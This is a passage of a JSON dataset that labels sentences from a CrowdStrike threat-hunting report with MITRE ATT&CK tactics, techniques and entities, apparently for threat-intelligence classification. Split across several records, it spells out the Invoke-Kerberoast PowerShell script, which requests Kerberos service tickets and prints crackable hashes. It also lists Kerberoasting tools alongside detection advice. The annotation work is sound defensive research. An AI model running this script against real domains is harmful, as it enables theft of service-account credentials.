"Snippet of a script execution in an attempt to enumerate SPNs $Null = [Reflection.Assembly]::LoadWithPartialName( 'System.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "script execution", "entities": [ { "text": "script execution", "start": 13, "end": 29, "label": "Action" }, { "text": "to enumerate", "start": 44, "end": 56, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s124-483e39", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 124, "context_before": "Snippet of a script execution in an attempt to enumerate SPNs $Null = [Reflection.Assembly]::LoadWithPartialName( 'System.", "sentence_text": "IdentityModel' ); $search = New-Object DirectoryServices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s126-a37cef", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 126, "context_before": "DirectorySearcher(", "sentence_text": "[ADSI]'' ); $search.filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s127-a9ae42", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 127, "context_before": "[ADSI]'' ); $search.filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.", "sentence_text": "Findall(); foreach ( $results in $results ) { $u = $results.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p12-s128-22c56f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 12, "sentence_id": 128, "context_before": "Findall(); foreach ( $results in $results ) { $u = $results.", "sentence_text": "GetDirectoryEntry(); $samAccountName = $u.samAccountName;\nforeach ( $s in $u.servicePrincipalName )", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s129-d8daac", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 129, "context_before": "GetDirectoryEntry(); $samAccountName = $u.samAccountName;\nforeach ( $s in $u.servicePrincipalName )", "sentence_text": "NOWHERE TO HIDE 13", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s130-3bc06b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 130, "context_before": "NOWHERE TO HIDE 13", "sentence_text": "The following is an expanded version of the script above, which was determined to be associated with the Invoke- Kerberoast.ps1 PowerShell script.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s131-7db8b0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 131, "context_before": "The following is an expanded version of the script above, which was determined to be associated with the Invoke- Kerberoast.ps1 PowerShell script.", "sentence_text": "The Kerberoasting activity below involves Active Directory being queried to request the username and SPN associated with accounts that have an SPN set.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "kerberoasting activity", "entities": [ { "text": "The Kerberoasting activity", "start": 0, "end": 26, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s132-a5ee03", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 132, "context_before": "The Kerberoasting activity below involves Active Directory being queried to request the username and SPN associated with accounts that have an SPN set.", "sentence_text": "The $TicketHexStream variable is storing the hexadecimal value of the Kerberos service ticket, which is then processed to extract a hash that can be used for offline password cracking.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s133-04cde6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 133, "context_before": "The $TicketHexStream variable is storing the hexadecimal value of the Kerberos service ticket, which is then processed to extract a hash that can be used for offline password cracking.", "sentence_text": "$Null = [Reflection.Assembly]::LoadWithPartialName( 'System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s134-63bb5a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 134, "context_before": "$Null = [Reflection.Assembly]::LoadWithPartialName( 'System.", "sentence_text": "IdentityModel' ); $search = New-Object DirectoryServices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s135-75d574", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 135, "context_before": "IdentityModel' ); $search = New-Object DirectoryServices.", "sentence_text": "DirectorySearcher(", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s136-daaaac", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 136, "context_before": "DirectorySearcher(", "sentence_text": "[ADSI]'' ); $search.filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s137-03dd5a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 137, "context_before": "[ADSI]'' ); $search.filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.", "sentence_text": "Findall();\nforeach ( $results in $results ) { $u = $results.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s138-ec41b6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 138, "context_before": "Findall();\nforeach ( $results in $results ) { $u = $results.", "sentence_text": "GetDirectoryEntry(); $samAccountName = $u.samAccountName; foreach ( $s in $u.servicePrincipalName ) { $Ticket = $null; try { $Ticket = New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s140-f02d16", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 140, "context_before": "IdentityModel.", "sentence_text": "Tokens.KerberosRequestorSecurityToken", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s142-647a8c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 142, "context_before": "-ArgumentList", "sentence_text": "$s;\n} catch [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s145-c6fb7b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 145, "context_before": "Automation.", "sentence_text": "MethodInvocationException] {} if ( $Ticket -ne $null ) { $TicketByteStream = $Ticket.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s146-5a3f77", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 146, "context_before": "MethodInvocationException] {} if ( $Ticket -ne $null ) { $TicketByteStream = $Ticket.", "sentence_text": "GetRequest(); if ( $TicketByteStream ) { $TicketHexStream = [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s147-1e6754", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 147, "context_before": "GetRequest(); if ( $TicketByteStream ) { $TicketHexStream = [System.", "sentence_text": "BitConverter]::ToString( $TicketByteStream ) -replace '-'; [System.Collections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s148-8d53a4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 148, "context_before": "BitConverter]::ToString( $TicketByteStream ) -replace '-'; [System.Collections.", "sentence_text": "ArrayList]$Parts = ( $TicketHexStream -replace '^(.*?)04820...(.*)', '$2' ) -Split 'A48201';\n$Parts.RemoveAt( $Parts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s149-690529", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 149, "context_before": "ArrayList]$Parts = ( $TicketHexStream -replace '^(.*?)04820...(.*)', '$2' ) -Split 'A48201';\n$Parts.RemoveAt( $Parts.", "sentence_text": "Count - 1 ); $Hash = $Parts -join 'A48201'; try { $Hash = $Hash.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s150-49cd54", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 150, "context_before": "Count - 1 ); $Hash = $Parts -join 'A48201'; try { $Hash = $Hash.", "sentence_text": "Insert( 32, '$' ); $HashFormat = '$krb5tgs$23$*' + $samAccountName + '/' + $s + '*$' + $Hash; Write-Host $HashFormat; break; } catch [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p13-s153-6ba465", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 13, "sentence_id": 153, "context_before": "Automation.", "sentence_text": "MethodInvocationException] {} } } } }", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s154-a36ded", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 154, "context_before": "MethodInvocationException] {} } } } }", "sentence_text": "NOWHERE TO HIDE 14 Top Five Tools Used in Kerberoasting Attacks", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s155-72377a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 155, "context_before": "NOWHERE TO HIDE 14 Top Five Tools Used in Kerberoasting Attacks", "sentence_text": "The following table lists — in order — the top five tools Falcon OverWatch observed adversaries use for Kerberoasting attacks over the past year.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "adversaries use kerberoasting", "entities": [ { "text": "adversaries", "start": 84, "end": 95, "label": "MalwareTool" }, { "text": "use for Kerberoasting", "start": 96, "end": 117, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s157-f747ef", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 157, "context_before": "Tool", "sentence_text": "What It Does How It Works Rubeus Rubeus is a C# tool that allows an adversary to interact Adversaries use this tool to perform attacks such with the Kerberos authentication mechanism.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s158-78e6ad", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 158, "context_before": "What It Does How It Works Rubeus Rubeus is a C# tool that allows an adversary to interact Adversaries use this tool to perform attacks such with the Kerberos authentication mechanism.", "sentence_text": "as ticket manipulation, password brute-forcing, Kerberoasting, and Golden Ticket and Silver Ticket attacks.1 PowerSploit PowerSploit is an exploit framework that contains various Adversaries use this tool to automate the process of modules, including Invoke-Kerberoast, a module designed SPN enumeration, ticket manipulation and password to automate Kerberoasting functions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s159-02560d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 159, "context_before": "as ticket manipulation, password brute-forcing, Kerberoasting, and Golden Ticket and Silver Ticket attacks.1 PowerSploit PowerSploit is an exploit framework that contains various Adversaries use this tool to automate the process of modules, including Invoke-Kerberoast, a module designed SPN enumeration, ticket manipulation and password to automate Kerberoasting functions.", "sentence_text": "cracking.2 BloodHound/ BloodHound is a web-based tool that can be used Adversaries typically use these tools together to to perform reconnaissance on Active Directory understand and visualize a target’s Active Directory SharpHound environments and identify attack paths that can be used in objects and environment, and then generate data the context of a Kerberoasting attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s160-fcef0b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 160, "context_before": "cracking.2 BloodHound/ BloodHound is a web-based tool that can be used Adversaries typically use these tools together to to perform reconnaissance on Active Directory understand and visualize a target’s Active Directory SharpHound environments and identify attack paths that can be used in objects and environment, and then generate data the context of a Kerberoasting attack.", "sentence_text": "that can be used to identify potential attack paths and3 privilege escalation opportunities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s161-525d62", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 161, "context_before": "that can be used to identify potential attack paths and3 privilege escalation opportunities.", "sentence_text": "SharpHound is a PowerShell-based tool that can be used to enumerate Active Directory environments and retrieve data that can be visualized within BloodHound.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s162-8cc650", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 162, "context_before": "SharpHound is a PowerShell-based tool that can be used to enumerate Active Directory environments and retrieve data that can be visualized within BloodHound.", "sentence_text": "Impacket Impacket is a toolset of Python-based utilities that can The GetUserSPNs utility can be used to enumerate be used to perform a wide range of attacks, including service accounts within Active Directory by requesting launching attacks to exploit weaknesses in the Kerberos service tickets for any accounts with associated SPNs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s164-0d3d22", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 164, "context_before": "protocol.", "sentence_text": "Popular Impacket tools for performing4 Kerberoasting attacks include GetUserSPNs and The Ticketer utility can be used to request service Ticketer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s165-70674d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 165, "context_before": "Popular Impacket tools for performing4 Kerberoasting attacks include GetUserSPNs and The Ticketer utility can be used to request service Ticketer.", "sentence_text": "tickets with specific encryption types, which may cause the domain controller to encrypt the ticket with the user's password hash.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s166-14bc00", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 166, "context_before": "tickets with specific encryption types, which may cause the domain controller to encrypt the ticket with the user's password hash.", "sentence_text": "This utility can then decrypt the service ticket to extract the password hash of a user.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558", "name": "Steal or Forge Kerberos Tickets" } ], "procedure": "Decrypts service tickets to extract user password hashes.", "entities": [ { "text": "decrypt", "start": 22, "end": 29, "label": "Action" }, { "text": "service ticket", "start": 34, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "extract the password hash", "start": 52, "end": 77, "label": "Action" }, { "text": "password hash", "start": 64, "end": 77, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s167-5864cf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 167, "context_before": "This utility can then decrypt the service ticket to extract the password hash of a user.", "sentence_text": "SharpRoast SharpRoast is a C# tool within the SharpTools toolset.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s168-e1a027", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 168, "context_before": "SharpRoast SharpRoast is a C# tool within the SharpTools toolset.", "sentence_text": "Adversaries can use this tool to perform SPN The SharpRoast tool can be used to interact with the enumeration and output results into various formats Kerberos protocol to perform Kerberoasting attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p14-s170-82a8e1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 14, "sentence_id": 170, "context_before": "for analysis.", "sentence_text": "The tool also performs the same functions as Ticketer, whereby it can decrypt service tickets to5 extract the password hash of a user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s171-4adccf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 171, "context_before": "The tool also performs the same functions as Ticketer, whereby it can decrypt service tickets to5 extract the password hash of a user.", "sentence_text": "NOWHERE TO HIDE 15 Defensive Countermeasures Falcon OverWatch increasingly sees adversaries using Kerberoasting to gain a greater foothold within Windows environments and escalate privileges.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "adversaries using kerberoasting to gain foothold inside windows and escalate privileges", "entities": [ { "text": "adversaries ", "start": 80, "end": 92, "label": "MalwareTool" }, { "text": "using Kerberoasting", "start": 92, "end": 111, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s172-77bd3a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 172, "context_before": "NOWHERE TO HIDE 15 Defensive Countermeasures Falcon OverWatch increasingly sees adversaries using Kerberoasting to gain a greater foothold within Windows environments and escalate privileges.", "sentence_text": "Defenders should investigate for signs of this activity to help identify protocol weaknesses and weak or compromised accounts, and find opportunities to improve detections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s173-fbc941", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 173, "context_before": "Defenders should investigate for signs of this activity to help identify protocol weaknesses and weak or compromised accounts, and find opportunities to improve detections.", "sentence_text": "The following recommendations will allow hunters to identify or mitigate this type of attack within their environment:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s174-aa5e89", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 174, "context_before": "The following recommendations will allow hunters to identify or mitigate this type of attack within their environment:", "sentence_text": "Interrogate Windows Event logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s175-2381f7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 175, "context_before": "Interrogate Windows Event logs.", "sentence_text": "Both Security Event ID 4769 (Kerberos Service Ticket Request) and Event ID 4771 (Kerberos Pre-Authentication Failure) can indicate that Kerberoasting is taking place, especially when seen in large volumes over a short time period.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s176-e5a47b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 176, "context_before": "Both Security Event ID 4769 (Kerberos Service Ticket Request) and Event ID 4771 (Kerberos Pre-Authentication Failure) can indicate that Kerberoasting is taking place, especially when seen in large volumes over a short time period.", "sentence_text": "Security Event ID 4769 should be filtered to look for Ticket Encryption Type 0x17 and 0x18, which indicate a weak RC4 cipher has been used that is prone to being cracked.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s177-d51c4a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 177, "context_before": "Security Event ID 4769 should be filtered to look for Ticket Encryption Type 0x17 and 0x18, which indicate a weak RC4 cipher has been used that is prone to being cracked.", "sentence_text": "Filter for Kerberos network traffic that has RC4 encryption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s178-c5eb9d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 178, "context_before": "Filter for Kerberos network traffic that has RC4 encryption.", "sentence_text": "Adversaries usually opt to exploit RC4 because it is insecure.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1600", "name": "Weaken Encryption" } ], "procedure": "Adversaries exploit RC4", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": " exploit", "start": 26, "end": 34, "label": "Action" }, { "text": "RC4 ", "start": 35, "end": 39, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s179-7096db", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 179, "context_before": "Adversaries usually opt to exploit RC4 because it is insecure.", "sentence_text": "RC4 replies can be indicative of an adversary attempting to request service tickets using this type of encryption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s180-ff8043", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 180, "context_before": "RC4 replies can be indicative of an adversary attempting to request service tickets using this type of encryption.", "sentence_text": "Audit activity for accounts that are likely targets for Kerberoasting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s181-ba41fe", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 181, "context_before": "Audit activity for accounts that are likely targets for Kerberoasting.", "sentence_text": "This can be done by reviewing the Active Directory settings to see which service accounts have SPNs registered to them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s182-8f20f3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 182, "context_before": "This can be done by reviewing the Active Directory settings to see which service accounts have SPNs registered to them.", "sentence_text": "Ensure service account passwords are complex.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s183-490951", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 183, "context_before": "Ensure service account passwords are complex.", "sentence_text": "This will make them more resistant to password cracking attempts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s184-aa10b7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 184, "context_before": "This will make them more resistant to password cracking attempts.", "sentence_text": "Ensuring unique passwords are used for each service account will prevent one compromise from affecting multiple accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s185-679bb8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 185, "context_before": "Ensuring unique passwords are used for each service account will prevent one compromise from affecting multiple accounts.", "sentence_text": "Take offensive action.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p15-s186-a24424", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 15, "sentence_id": 186, "context_before": "Take offensive action.", "sentence_text": "Consider implementing a honey token approach to detect the use of service accounts with SPNs that have been deployed with weak passwords.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p16-s187-297f93", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 16, "sentence_id": 187, "context_before": "Consider implementing a honey token approach to detect the use of service accounts with SPNs that have been deployed with weak passwords.", "sentence_text": "NOWHERE TO HIDE 16 BEYOND USERNAMES AND PASSWORDS When discussing identity threats, it is important to distinguish different ways an entity can be identified and authenticated to a system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p16-s188-0ac0c5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 16, "sentence_id": 188, "context_before": "NOWHERE TO HIDE 16 BEYOND USERNAMES AND PASSWORDS When discussing identity threats, it is important to distinguish different ways an entity can be identified and authenticated to a system.", "sentence_text": "Though the majority of interactive intrusions observed by Falcon OverWatch involve abuse of valid accounts7 — which in most instances presents as username and password combinations — intrusions often leverage other factors of authentication and identifying material.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p16-s189-149afc", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 16, "sentence_id": 189, "context_before": "Though the majority of interactive intrusions observed by Falcon OverWatch involve abuse of valid accounts7 — which in most instances presents as username and password combinations — intrusions often leverage other factors of authentication and identifying material.", "sentence_text": "Some of the most common methods of identification and authentication are shown in Figure 7.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p16-s190-b8971f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 16, "sentence_id": 190, "context_before": "Some of the most common methods of identification and authentication are shown in Figure 7.", "sentence_text": "Username and password or PIN Session-based authentication, cookie-based authentication and Authentication using a username and JSON Web Tokens (JWT)\npassword or PIN Authentication to an application or system using Smart card and PIN an already created valid session or access token Authentication using a physical item Kerberos and Kerberos tickets paired with a PIN Authentication via tickets granted from a key Valid account and Active distribution center (KDC), which are usually Directory certificates granted from use of a username and password Authentication of computer or users using public Biometrics such as facial key infrastructure recognition, voice recognition, fingerprint recognition APIs and secret keys Authentication through use of biometrics such as fingerprint, face or voice, which compares these Authentication of application programming features to a saved template per user interfaces (APIs)\nHardware and software tokens or Identity providers and protocols time-based one-time password such as SAML and OAuth (TOTP)\nAuthentication of one or more identity providers Authentication that requires a second element, through a service such as federation single sign-on e.g., a time-based one-time password, physical (SSO) item or application Some less traditional means of identity abuse include the following:\n¼ Attempts to gather secret keys and other credential materials via cloud instance metadata APIs, which rose by 160% year over year ¼ Exploitation of weaknesses in Kerberos security to steal or forge authentication material, which rose by 410% year over year (the specific sub-technique of Kerberoasting rose by 583% year over year)\n¼ Pass-the-Hash attacks, which rose by 200% year over year ¼ Abuse of Active Directory Certificate Services (AD CS), which was seen in the 2023 reporting period but not the 2022 reporting period 7 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1078/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s191-845b8f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 191, "context_before": "Username and password or PIN Session-based authentication, cookie-based authentication and Authentication using a username and JSON Web Tokens (JWT)\npassword or PIN Authentication to an application or system using Smart card and PIN an already created valid session or access token Authentication using a physical item Kerberos and Kerberos tickets paired with a PIN Authentication via tickets granted from a key Valid account and Active distribution center (KDC), which are usually Directory certificates granted from use of a username and password Authentication of computer or users using public Biometrics such as facial key infrastructure recognition, voice recognition, fingerprint recognition APIs and secret keys Authentication through use of biometrics such as fingerprint, face or voice, which compares these Authentication of application programming features to a saved template per user interfaces (APIs)\nHardware and software tokens or Identity providers and protocols time-based one-time password such as SAML and OAuth (TOTP)\nAuthentication of one or more identity providers Authentication that requires a second element, through a service such as federation single sign-on e.g., a time-based one-time password, physical (SSO) item or application Some less traditional means of identity abuse include the following:\n¼ Attempts to gather secret keys and other credential materials via cloud instance metadata APIs, which rose by 160% year over year ¼ Exploitation of weaknesses in Kerberos security to steal or forge authentication material, which rose by 410% year over year (the specific sub-technique of Kerberoasting rose by 583% year over year)\n¼ Pass-the-Hash attacks, which rose by 200% year over year ¼ Abuse of Active Directory Certificate Services (AD CS), which was seen in the 2023 reporting period but not the 2022 reporting period 7 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1078/.", "sentence_text": "NOWHERE TO HIDE 17 This targeting of identity and authentication material showcases that valid accounts are highly prized by adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s192-c37bba", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 192, "context_before": "NOWHERE TO HIDE 17 This targeting of identity and authentication material showcases that valid accounts are highly prized by adversaries.", "sentence_text": "Over the past year, 62% of all interactive intrusions used valid accounts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "use of valid account", "entities": [ { "text": " used valid accounts", "start": 53, "end": 73, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s193-76984e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 